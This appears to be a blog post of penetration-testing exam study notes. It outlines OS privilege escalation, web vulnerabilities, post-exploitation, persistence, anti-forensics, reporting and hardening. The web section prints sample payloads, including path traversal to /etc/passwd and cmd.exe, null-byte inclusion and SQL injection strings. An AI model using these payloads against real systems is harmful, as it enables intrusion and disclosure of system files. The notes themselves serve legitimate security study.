  • Exploit MS17-010 in the lab using Metasploit
  • Exploit MS17-010 in the lab using python exploit

File Permissions and Exploitations


  • File Permissions (ACLS)
  • Share Permissions
  • Alternate Data Steams (ADS)
    • Files have two steams
      • Data
      • Resource (You can hide data in ADS e.g. you could hide a binary inside a txt file)
  • Unquoted Service Path Privilege Escalation
    • Metasploit
    • PowerSploit
  • DLL Hijacking
  • NTFS Encryption Bypass
  • SAM/SYSKEY offline attakcs
  • EFS
    • Copying EFS to a network share will decrypt them
  • Bitlocker Exploits


  • Insecure Permissions
  • Sticky BIT
  • Symbolic Link/Broken Symbolic Link Exploitation
  • Secure Shell Escapes

Linux Sensitive Files

  • /etc/profile
  • /etc/hosts
  • /etc/resolv.conf
  • /etc/pam.d
  • ~/.bash_profile
  • ~/.bash_login
  • ~/.profile
  • /home


Kernel Vulnerabilities and Exploits

  • Privilege Escalation
  • DoS

Memory Vulnerabilities

  • RCE
  • DoS
  • Common Vulns
    • Use-After-Free
    • Buffer Overflow

Default Accounts


  • Administrator
  • Guest
  • DefaultAccount
  • WDAGUtility
  • Defaultuser()

Linux (nix)


  • root
  • adm
  • nobody
  • sshd
  • lp
  • uucp



  • Guest
  • Low Priv Users (e.g. IIS_USR)
  • Virtual Machines
  • Browser Sandboxes
  • Adobe Flash Sandbox
  • Containers
    • Docker
    • Hyper-V Containers
  • Mobile Apps
  • PDF and Documents
  • Antivirus Quarantine Features
  • Defender SmartScreen
  • Mail Program Sandboxes

Escape Techniques

  • Sleeps
  • Large Files
  • Polymorphic Malware
  • Rootkits/bootkits
  • Encryption
  • Logic Bombs
  • Archive Tools
  • Binary Packers
  • Network Fast Flux (Rotating IPs or jumping hosts)
  • Sandbox Detection/Evasion


OS X is based on BSD (unix)

  • IOMobileFrameBuffer (IOS)
    High Sierra
    • Root access with NO password
  • Mactans
    • USB attack
  • Jailbreaking IOS
    • Keyraider
  • Thunderstrike
    • Thunderbolt bootkit (OS 10 firmware device)
  • iCloud API vulnerabilities
  • MaControl Backdoor (OS X)
  • Graphic Driver Vulnerability (IOS)


  • Theft
  • Lack of Encryption
  • Side-Loading Aps
  • Root devices
  • Weak or No Passwords
  • Biometric Bypass
  • SQLLite Injection
  • Excessive App Permissions
  • Insure application communications
  • No or disabled security tools e.g. Antivirus
  • Missing Patches/Out of Date Software
  • QuadRooter
    • Qualcom Chipset Vulnerability
  • Certifi-Gate mRST flaw
    • Allows sideloading (<Lolipop (5.1))
  • Stagefright MMS Privesc and RCE (<Lolipop (5.1))
  • Installer hijacking
  • TowelRoot (<Kitkat (4.4))
  • Cross-platform protocol vulnerabilities
    • DirtyCow
    • POODLE

Physical Attacks

  • Unencrypted Storage
  • Cold Boot Attacks
    • Recover keys from RAM
  • Insecure Serial Console (with no authentication)
  • JTAG Access/Debugging

Common Cracking Tools

  • Hashcat
    • Windows
    • Linux
  • John The Ripper (John)

Attacking Applications and Web Applications

Common Protocols & Languages

  • HTTP
  • HTML
  • Javascript
  • SQL Databases
  • Frameworks
    • Node.js
    • Angular
    • Django
  • Python
  • PHP

Common Web Application Vulnerabilities

  • Weak security configurations (misconfigurations)
  • Broken Authentication
  • XSS
  • CSRF
  • Clickjacking
  • File inclusion
  • Weak coding practises

Common Misconfigurations

  • Rolling your own encryption
  • Legacy content
  • Debugging Modes Enabled
  • Unpatched Vulnerabilities/Using software with known vulnerabilities
  • Client-side processing
  • Default admin accounts
  • Insecure cookies
  • Directory Traversal
    • Read or execute
    • E.g. ../../../etc/passwd
    • E.g. %2E%2E%2F/Windows/System32/cmd.exe
    • Double Encoding
      • %25 = %
        • %25E%25E%25FWindows/System32/cmd.exe
        • Null byte encoding %00
        • E.g. index.php?file=../../etc/passwd%00
    • Test using
      • BURP
      • OWASP ZAP

LAB Tasks

  • Test out BURP
  • Test out OWASP ZAP
  • Try manual identification of a path traversal

Common Web Application Attacks

Authentication & Authorisation Attacks

  • Brute Force
  • Credential Stuffing
  • Weak Passwords
  • Session Hijacking
  • MiTM
  • XSS Cookie Theft
  • Bypass Authentication
  • Redirection Attack
  • ReturnURL attack (
  • HTTP Parameter Pollution (HPP)
  • IDOR

Injection Attacks

  • Command Injection
  • SQLi
    • Test using “’” in a form POST/GET request
    • Logic injection: “’ or 1=1–;

HTML Injection

Inject HTML code e.g. inject links inject or embedded forms (e.g. clickjacking) into areas such as forums etc.

Cross Site Scripting (XSS)

There are a few types of XSS:

  • Stored (persistent)
  • Reflected (reflects then executes)
  • Blind
  • DOM-based

An example of XSS = alert(‘This site is vulnerable to XSS!’);

Cross Site Request Forgery (XSRF)

Getting a user to interact with a URL against another site e.g. user visits phishing site, they click on a link to the benign site, but an unwanted action occurs. E.g. adding extra quantities of items to a shopping basket.


Setting up an iframe on a malicious site to embed content to masquerade as a site. Can be used with phishing or social engineering.

Other Vulnerabilities/Exploits

  • File Inclusions
  • Local File Inclusion
  • Remote File Inclusion
  • Insecure Direct Object Reference (IDOR)
  • Logic Errors
  • Timing Issues (Race Conditions)
  • No Error handling
  • Insecure Functions
  • Insecure APIs
  • Insecure Credential Storage/Transmission
  • Sensitive Information Disclosure

Lab Work

  • Learn to use SQLMAP
  • Run SQLMAP through BURP to understand how it works
  • Run a manual authentication bypass using SQL injection
  • Test manual exploitation using union selects
  • Test path traversal to read /etc/passwd
  • Demonstrate a self-reflected XSS alert
  • Demonstrate a stored XSS alert
  • Demonstrate using a stored XSS using BEEF

Source Code analysis and Compiled Apps

Static Code Analysis

Source code review while it’s not executing

  • Manual Source Code Review
  • Tool based review (SAST – Static Analysis Security Testing)

Dynamic Code Analysis

  • Dynamic (DAST)


Fault injection. Random data is sent to the apps looking for crashes or unexpected responses.

Reverse Engineering

  • Debugging
    • Immunity
    • Ghidra
    • WinDbg
    • OllyDbg
    • GDB
    • IDA/IDA Pro
  • Decompiling
    • Reverse the compiled binary and converting it to source code
      • Hex-Rays IDA
      • VB Decompile
      • Delphi Decompiler
      • CFF Explorer
      • JetBrains DotPeek
  • Disassembly
    • Translating machine code into Assembly Code

Post Exploitation


Once you have access to a target you will continue to enumerate (recon).

Lateral Movement


  • NetCAT
    • Bind
    • Reverse Shells
  • SSH
    • SSHKeys
    • AuthorizedHosts
  • VPN
  • Routing Tables
  • Metasploit Forwarder

Maintaining Persistence

  • Create a backdoor account
  • Create a service/daemon
  • Backdoors
  • VPNs
  • Scheduled Tasks/Cron Jobs
  • Login scripts, Login Tasks, Start-up Tasks etc.
  • Rootkits
    • Firmware
    • Kernel
    • Filter Drivers
  • Implants

Evading Security Solutions & Anti-Forensics

  • Buffer Overflows
  • Memory Resident Malware
  • Packing
  • Virtual Machine Detection
  • Clearing Logs
    • Whole Log
    • Specific Log
  • Shredding Files
  • File Metadata Tampering
  • Log Tampering

Penetration Test Reporting

Key Areas

  • Categorisation
  • Prioritisation
  • Recommendations

Report Format

  • Executive Summary
  • Technical Findings
  • Recommendations


  • People
  • Process
  • Technology
  • Customer Business Context
  • Customer Industry

Prioritising Findings

  • Likelihood
  • Impact
  • CVSS Score etc.

Authentication Recommendations

  • Don’t hardcode credentials in apps
  • Random SALT and HASH Passwords
  • Use strong encryption, avoid weak hashes
  • User secure transport e.g. do NOT use FTP, use FTPS/SFTP
  • Don’t use protocols that use weak ciphers
  • Avoid configurations that allow for downgrade attacks
  • Monitor unencrypted traffic

Authentication Recommendations

  • Use Multi-factor-authentication
    • Something you know
    • Something you have
    • Something you are
  • Smart Cards, Smart Phone Apps, Key fobs (Like Yukikey), OTP keys (RSA)

Input and Output Sanitisation

  • Escape characters/Encoding to stop HTML being rendered
    • E.g. htmlspecialchars() function of PHP
    • HTML Sanitizers (Libraries)
      • Java HTML
      • .NET HTML Sanitizer
      • HTML purifier
      • SanitizeHelper for RUBY on Rails
    • Convert HTML to mardown
    • Prevent NULL Byte by removing the input manually (for older browsers)

Parametrisation of Queries (Declared Statements)

  • More effective at preventing SQLi
    • Means the parameters are send to a pre-defined template

Hardware and Software Hardening


  • Environment
  • Hardware
  • Software

Look at industry standards such as:

  • CIS Controls
  • ISO
  • NIST
  • SANS

Hardening Measures

  • Check with the vendor
  • Look at EAL/Common Criteria (Real world)
  • Ensure firmware and software are updated with updates from the vendor
  • Physical and/or network segmentation

Mobile Device Management (MDM)

  • Centralised Device and App Management
  • Similar systems (MAM)
  • Centrally deploy policies

MDM Features

  • PUSH OS, apps and firmware updates
  • Enrol and authenticate devices
  • Enforce Policies
  • Locate Devices
  • Deploy based on user profiles
  • Remote Wipe/Remote Lock
  • Send out PUSH notification
  • Remote Access
  • Deploy Containers
  • Encryption Control

Secure Software Development

  • Should follow SDLC (Secure Software Development Lifecycle) which incorporates security throughout the entire lifecycle


  • Penetration Testing
  • Static Code Analysis
  • Fuzzing
  • Static Code Analysis
  • Vulnerability Management
  • Dependency Management

SDLC should be:

  • Clear and simple
  • Useful and Informative
  • East to incorporate
  • Extensible
  • Have as fewer dependencies as possible
  • Be concise
  • Use well-known and established techniques
  • Integrates with testing processes and harnesses
  • Aligns with business and design requirements

Post-Report Delivery Actions

  • Data Normalization
    • Format
    • Structure
    • Language
    • Metrics and Measures
    • Risk Ratings
      • Impact x Likelihood
  • Report Structure
    • Exec Summary
    • Version Control
    • Document Distribution
    • Method
    • Findings
    • Conclusion
      • Successes
      • Failures
      • Goal Assessment
    • Supporting Evidence
  • Risk Appetite
    • How hungry are the customer for accepting risk/residual risk?
      • Compare risk of findings vs risk appetite/tolerance levels
    • How much loss can be accepted?
    • What are acceptable levels of availability/loss of availability?
  • Report Storage
    • Encrypt at Rest
    • Encrypt in Transit
    • Access Control for authorised personnel only
    • Store for a specific limited amount of time
  • Report Handling
    • Destruction
  • Report Disposition
    • Formal process of transferring the report to the customer and they then become responsible for it
    • Sign off by the authorised recipient
  • Post Engagement Clean up Tasks
    • Removal of Access/Credentials
    • Removal of Tools
  • Acceptance
  • Attestation of Findings
  • Lessons Learned
  • Follow Up Actions

Useful Exam Theory Links

Microsoft Threat Modelling

Step 1. Identify Assets
Step 2. Create an Architecture Overview
Step 3. Decompose the Application
Step 4. Identify the Threats
Step 5. Document the Threats
Step 6. Rate the Threats

IEEE 802.11 Wireless Standard

Random Stuff

C2 Frameworks

  • Covenant
  • C2
  • Cobalt Strike (Commercial)
  • Metasploit Pro
  • Core Impact
  • SharpC2

DNS Tunnelling

External Resources

The Cyber Mentor Courses on Udemy

A picture containing clock, drawing

Description automatically generated



Description automatically generated



Description automatically generated


How to avail PluralSight #FREEapril offer in 3steps | by Vinay ...

Proctored Online Exam Details

Online Practise Questions – Free

Ordering Exam Vouchers

Vouchers Resellers

Windows Vulnerabilities


Resources & Useful Links

UAC Bypasses

Leave a Reply